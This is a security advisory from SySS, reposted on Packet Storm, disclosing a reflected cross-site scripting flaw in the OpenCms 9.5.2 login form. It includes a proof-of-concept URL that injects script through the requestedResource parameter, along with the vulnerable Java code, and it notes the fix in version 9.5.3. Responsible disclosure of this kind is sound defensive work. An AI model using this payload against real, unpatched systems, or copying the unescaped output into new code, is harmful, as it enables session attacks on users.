exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

OpenCms 9.5.2 Cross Site Scripting

OpenCms 9.5.2 Cross Site Scripting
Posted Feb 23, 2016
Authored by Rainer Boie | Site syss.de

OpenCms version 9.5.2 suffers from a cross site scripting vulnerability.

tags | exploit, xss
SHA-256 | 90836f4c2cffaaf16a53502663f30a5c82ff5d7140b8933a573d1c03a30e34a1

OpenCms 9.5.2 Cross Site Scripting

Change Mirror Download
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

Advisory ID: SYSS-2015-063
Product: OpenCms
Official Maintainer: Alkacon Software GmbH
Affected Version(s): 9.5.2
Tested Version(s): 9.5.2
Vulnerability Type: Cross-Site Scripting (CWE-79)
Risk Level: Medium
Solution Status: Fixed
Maintainer Notification: 2015-11-27
Solution Date: 2016-01-13
Public Disclosure:
CVE Reference: Not yet assigned
Author of Advisory: Rainer Boie (SySS GmbH)

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Overview:

OpenCms is an open source web content management system. Alkacon
Software GmbH is the official maintainer and the major contributor for
OpenCms (see [1]).

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Vulnerability Details:

The SySS GmbH found out that a logged on user with at least workspace
access is vulnerable to a reflected cross-site scripting attack using
the OpenCms login form. An attacker can use an URL to create the attack
as the attack vector is triggered by an HTTP GET request.

It is recommended to filter and escape transmitted parameter values.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Proof of Concept (PoC):

Using a fresh installation of OpenCms in version 9.5.2 and generating
and logging in with a user with workspace access rights, the following
attack vector was used:

http://<HOST>:<PORT>/opencms/opencms/system/login/index.html?requestedResource=%2Fsystem%2Fworkplace%2Fcommons%2Fdisplayresource.jsp%3Fresource%3D%252Fsuchergebnis%252Findex.html";alert('XSS');//&__loginform=true


The parameter is handled by the function appendWorkplaceOpenerScript in
the file CmsLogin.java.

The vulnerable code section is:

html.append("\tvar openUri = \"");
html.append(link(openResource));
html.append("\";\n");
html.append("\tvar workplaceWin = openWorkplace(openUri, \"");


The JavaScript code is executed in the web browser as it is included in
the following affected part of the HTML response:

function doOnload() {
var openUri = "/opencms/opencms/system/workplace/commons/displayresource.jsp?resource=%2Fsuchergebnis%2Findex.html";alert('XSS');//";
var workplaceWin = openWorkplace(openUri, "OpenCms1448623274999");
if (window.name != "OpenCms1448623274999") {
window.opener = workplaceWin;
if (workplaceWin != null) {
window.close();
}
}
}


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Solution:

The main maintainer Alkacon Software GmbH published 01/13/2016 version
9.5.3 where the flaw is fixed.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclosure Timeline:

2015-11-27: Vulnerability reported to the official maintainer Alkacon
Software GmbH
2015-12-04: Vulnerability reported to the official maintainer Alkacon
Software GmbH
2015-12-04: Response from maintainer: The issue is fixed in version
9.5.3 which is planned to be published 01/13/2016.

2016-01-13: Release 9.5.3 published

2016-01-20: Checked and confirmed fix of vulnerability in version 9.5.3

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

References:

[1] Product Web site for OpenCms
http://www.opencms.org
[2] SySS Security Advisory SYSS-2015-063
https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2015-063.txt
[3] SySS Responsible Disclosure Policy
https://www.syss.de/en/news/responsible-disclosure-policy/

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~


Credits:

This security vulnerability was found by Rainer Boie of the SySS GmbH.

E-Mail: rainer.boie (at) syss.de
Public Key: https://www.syss.de/fileadmin/dokumente/Materialien/PGPKeys/Rainer_Boie.asc
Key fingerprint = E724 9ECC 7E6F 1008 16AB 1A53 5C12 823D 608D 7AE9

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclaimer:

The information provided in this security advisory is provided "as is"
and without warranty of any kind. Details of this security advisory may
be updated in order to provide as accurate information as possible. The
latest version of this security advisory is available on the SySS Web
site.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Copyright:

Creative Commons - Attribution (by) - Version 3.0
URL: http://creativecommons.org/licenses/by/3.0/deed.en

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v2

iQEcBAEBCgAGBQJWyxBmAAoJEFwSgj1gjXrpapYH/1eKvLsApiVYoAn84Guy2sbn
n2LJUORCMkByi2gDCsMij2Y2gnF3cebhsmsos0e6UdGl4f3ztRAnNFI5JLKZ9GjB
xfbNZ0kVqaocETTkqpMWNcEpM57E5/2fnsOEdxZjjMA5wg6DGLZYzRAxx/nEWSCn
eQGf8BCKLufLp2MAdNfjCKr4zBE8i+ZBF6QYAoG3YItbIXZvH5WLxfcsPtacoj2K
LQHW34V9k6OFDmztfmYo42BhhGy1pj7zcZhlQDL+a3iqvDGeGS2F27vnRgbFFBVD
3K6sfQk78Fx4ceKn32ew8knahUl+DrzgaYnR/JZqGdjOSg871j2jiPt8Esqq2lc=
=bRHg
-----END PGP SIGNATURE-----
Login or Register to add favorites

File Archive:

February 2023

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Feb 1st
    11 Files
  • 2
    Feb 2nd
    9 Files
  • 3
    Feb 3rd
    5 Files
  • 4
    Feb 4th
    0 Files
  • 5
    Feb 5th
    0 Files
  • 6
    Feb 6th
    9 Files
  • 7
    Feb 7th
    0 Files
  • 8
    Feb 8th
    0 Files
  • 9
    Feb 9th
    0 Files
  • 10
    Feb 10th
    0 Files
  • 11
    Feb 11th
    0 Files
  • 12
    Feb 12th
    0 Files
  • 13
    Feb 13th
    0 Files
  • 14
    Feb 14th
    0 Files
  • 15
    Feb 15th
    0 Files
  • 16
    Feb 16th
    0 Files
  • 17
    Feb 17th
    0 Files
  • 18
    Feb 18th
    0 Files
  • 19
    Feb 19th
    0 Files
  • 20
    Feb 20th
    0 Files
  • 21
    Feb 21st
    0 Files
  • 22
    Feb 22nd
    0 Files
  • 23
    Feb 23rd
    0 Files
  • 24
    Feb 24th
    0 Files
  • 25
    Feb 25th
    0 Files
  • 26
    Feb 26th
    0 Files
  • 27
    Feb 27th
    0 Files
  • 28
    Feb 28th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close